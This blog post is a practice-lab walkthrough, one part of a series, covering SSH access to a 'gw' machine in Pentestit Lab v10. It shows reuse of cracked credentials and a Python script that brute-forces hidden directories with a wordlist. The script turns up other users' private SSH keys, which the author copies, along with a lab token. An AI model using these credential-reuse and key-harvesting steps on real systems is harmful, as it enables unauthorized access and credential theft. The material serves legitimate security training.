In my previous post “Pentestit Lab v10 - Site Token (2/13)”, we mapped the attack surface of the GDS Blog, exploited a SQL Inject while bypassing the WAF filter, cracked user credentials, gained administrative access to the blog, and scored our second token. Today we will be leveraging our new found credentials to compromise the gw machine - which will include the following:

  • Leveraging Credentials for SSH Access
  • Enumerating Linux Files & Directories
  • Extracting Private Data
  • Finding the SSH Token

Leveraging Credentials for SSH Access:

In my previous post, I was able to compromise the blogs backend SQL Server and managed to attain the credentials of e.lindsey:lindsey123 - which gave me admin access to the Blog.

Since those credentials allowed me admin access, my next step was to try and gain SSH access to the gw machine.

So let’s go ahead and try to access SSH with those credentials.

root@kali:~# ssh e.lindsey@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:A5T5DHV6QBNJ/uT+oBYi1VrS+EVZ/vFv+ECwCC/Xp7I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
e.lindsey@'s password: 
Linux tl10-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.82-1 x86_64
Last login: Thu Dec  1 12:17:26 2016 from

Awesome! So it seems that our leveraged credentials also have SSH access (network access) to the gw machine, and possibly other machines in the internal network!

Enumerating Linux Files & Directories:

Now that we have internal access to the gw machine, let’s do some enumeration and see if we can’t find anything interesting.

e.lindsey@tl10-ssh:~$ cd ..
e.lindsey@tl10-ssh:/home$ ls
a.modlin  e.lindsey  g.leone  k.barth  m.howard  rross  s.locklear

Going to the home folder showed me that there are multiple users on the machine - so I decided to dig through each of these folders for any interesting data, but that boded no results.

At this point I decided to look at the root directory to see if there might be any interesting folders left behind.

e.lindsey@tl10-ssh:/home$ cd /
e.lindsey@tl10-ssh:/$ ls
bin   database  home        lib64       mnt   root  selinux  tmp  vmlinuz
boot  dev       initrd.img  lost+found  opt   run   srv      usr
data  etc       lib         media       proc  sbin  sys      var

The data folder looked interesting sine it isn’t a common directory in Linux, so let’s dig into that and see if there isn’t anything in there that we can use.

e.lindsey@tl10-ssh:/$ cd data/
e.lindsey@tl10-ssh:/data$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov 25 14:34 .
drwxr-xr-x 24 root root 4096 Nov 25 23:19 ..
drwxr-x--x  8 root root 4096 Nov 25 15:14 users
e.lindsey@tl10-ssh:/data$ cd users/
e.lindsey@tl10-ssh:/data/users$ ls -la
ls: cannot open directory .: Permission denied

Permission Denied? Really…. Well then, that means that there are actual folders in there that we don’t have access to. Possibly folders for all the other users that were located in the /usr folder.

There’s two things we can do here - find and leverage a privilege escalation exploit to gain root privileges, or write a python script to enumerate any files and folders based off the usernames in the /usr folder.

After some digging and enumeration I decided to go the Python Script route - since there was nothing that would allow me to escalate my privileges to root.

After a brief outline and some logic I came up with the following script:


import os

users = open("names.txt", "r")

for names in users.readlines():
	names = names.replace("\n", "")
	path = '/data/users/' + names + '/'
	tmp = os.path.isdir(path)
	if tmp == True:
		print path
		dir = open("common.txt", "r")
		for dir in dir.readlines():
			dir = dir.replace("\n", "")
			path2 = path + dir
			tmp2 = os.path.isdir(path2)
			if tmp2 == True:
				print '\033[1;34m [+] Directory Found\033[1;m', path2
				file = open("common.txt", "r")
				for file in file.readlines():
					file = file.replace("\n", "")
					path3 = path2 + '/' + file
					tmp3 = os.path.isfile(path3)
					if tmp3 == True:
						print '\033[1;32m [+] File Found\033[1;m', path3

If you don’t know what this script is doing, then I would love to explain it to you - but I suggest you go learn some basic Python and then come back and read it - this way you actually learn and understand the code better.

Either way - a quick over view of the script:

In the first few lines (as seen below) - I am reading in a file called names.txt which contains our attained usernames and naming that variable as “users”. Then I am reading each line from the users file (names.txt) and calling each line “names”.

For each of those names (lines) I mutate the name to remove any whitespace or newline so I just have the name - this prevents any issues when enumerating through the directories.

users = open("names.txt", "r")

for names in users.readlines():
	names = names.replace("\n", "")

At this point I create another variable called “path” which is set to /data/users/ plus the names variable. For example: for user e.lindsey the path would be - /data/users/e.lindsey.

I also create a “tmp” variable and run an os command to make sure that the path variable is an existent directory. If that path diretory exists, or is True, then we move on to the next portion. If not, go back grab a new username and try again.

path = '/data/users/' + names + '/'
tmp = os.path.isdir(path)
if tmp == True:

Once the tmp variable is true, we print out the path name to our terminal so we can see what path actually exists.

We then create a new variable called “dir” and open up the “common.txt” wordlist which contains common directory and file names. We then read in each line from dir and save that as a variable called “dir”.

print path
dir = open("common.txt", "r")
for dir in dir.readlines():

Once we get a new line from dir, we mutate dir to remove whitespaces and any new lines.

We then create a new variable called “path2” and concatenate our previous path variable to dir. Thus it would be something like - /data/users/e.lindsey/admin

We create a “tmp2” variable to see if path2 is a directory, and if True, we continue.

dir = dir.replace("\n", "")
path2 = path + dir
tmp2 = os.path.isdir(path2)
if tmp2 == True:

If the directory from path2 is found, we print it to our terminal.

We create a new variable called “file” and read in the common.txt file again. And once again we read in the lines from file and save that as the “file” variable.

print '\033[1;34m [+] Directory Found\033[1;m', path2
file = open("common.txt", "r")
for file in file.readlines():

We replace any whitespaces and newlines in file, create a new variable called “path3” and concatenate path2 to the new file variable.

We then create a new “tmp3” variable, to make sure path3 exists, and continue on. If path3 is True then we print out path3 to our terminal. So it should look like the following - /data/users/e.lindsey/admin/password.

file = file.replace("\n", "")
path3 = path2 + '/' + file
tmp3 = os.path.isfile(path3)
if tmp3 == True:
  print '\033[1;32m [+] File Found\033[1;m', path3

Once we have our script ready to go, let’s edit our names.txt file and make sure that we have all the usernames found in the gw system.

root@kali:~/gds# nano names.txt
root@kali:~/gds# cat names.txt 

Then let’s copy over the common.txt wordlist file to our current working directory, since we will be copying all that over to the gw machine via SCP.

root@kali:~/gds# cp /usr/share/wordlists/dirb/common.txt /root/gds/
root@kali:~/gds# ls
names.txt  common.txt  gds-authenticator.apk  lindsey_hash

Okay, so we have everything in place. Let’s go ahead and copy over the data from here to the /var/tmp location on the gw machine.

root@kali:~/gds# scp names.txt common.txt e.lindsey@
e.lindsey@'s password:                                   100%  684     6.2KB/s   00:00    
names.txt                                     100%   68     0.6KB/s   00:00    
common.txt                                    100%   35KB 132.8KB/s   00:00 

Once that’s completed and successful, let’s SSH back into the gw machine, navigate to /vat/tmp and make sure all the files are there!

Also - just in case, let’s also add “token.txt” into the common.txt file if we happen to stumble upon a token.

e.lindsey@tl10-ssh:/home$ cd /var/tmp/
e.lindsey@tl10-ssh:/var/tmp$ ls -a
.  ..  common.txt  .ipp  .n  names.txt  .sosat
e.lindsey@tl10-ssh:/var/tmp$ echo token.txt >> common.txt 

Extracting Private Data:

Awesome! We got our script, we know how it works, and we have all the files over on the gw machine!

From here give the script file execution permissions, and run it!

e.lindsey@tl10-ssh:/var/tmp$ chmod +x 
e.lindsey@tl10-ssh:/var/tmp$ ./ 
 [+] Directory Found /data/users/a.modlin/docs
 [+] File Found /data/users/a.modlin/docs/key
 [+] Directory Found /data/users/a.modlin/tmp
 [+] Directory Found /data/users/g.leone/files
 [+] Directory Found /data/users/rross/docs
 [+] File Found /data/users/rross/docs/token.txt
 [+] File Found /data/users/rross/docs/keys
 [+] Directory Found /data/users/rross/tmp
 [+] Directory Found /data/users/s.locklear/docs
 [+] Directory Found /data/users/s.locklear/files
 [+] Directory Found /data/users/s.locklear/tmp

Let’s see what we have here…. I see that a.modlin and rross both have key files - so let’s see what they are!

e.lindsey@tl10-ssh:/var/tmp$ cat /data/users/a.modlin/docs/key

Ohh this is juicy! We got a Private SSH Key!

We might need these for future exploitation purposes, so we need to save them!

e.lindsey@tl10-ssh:/var/tmp$ cat /data/users/a.modlin/docs/key > a.modlin.key
e.lindsey@tl10-ssh:/var/tmp$ cat /data/users/rross/docs/keys > rross.key

Finding the SSH Token:

From our script, we see that rross had the key file hidden away in his directory!

 [+] Directory Found /data/users/rross/docs
 [+] File Found /data/users/rross/docs/token.txt
 [+] File Found /data/users/rross/docs/keys
 [+] Directory Found /data/users/rross/tmp

So let’s just cat that, and we will have compromised the SSH Token!

Token (3/13):

Congrats on finding the token! Go ahead and submit it on the main page to gain points for it!

You might be wondering why I didn’t post the actual token. Well, what would be the fun in that if I did? Go through and actually try to compromise the GW Machine via SSH to get the token!

You learn by doing, so go through this walkthrough, and the lab - and learn something new!

That’s all for now, stay tuned for my next post as we compromise Token (4/13) - The SSH-Test Token!


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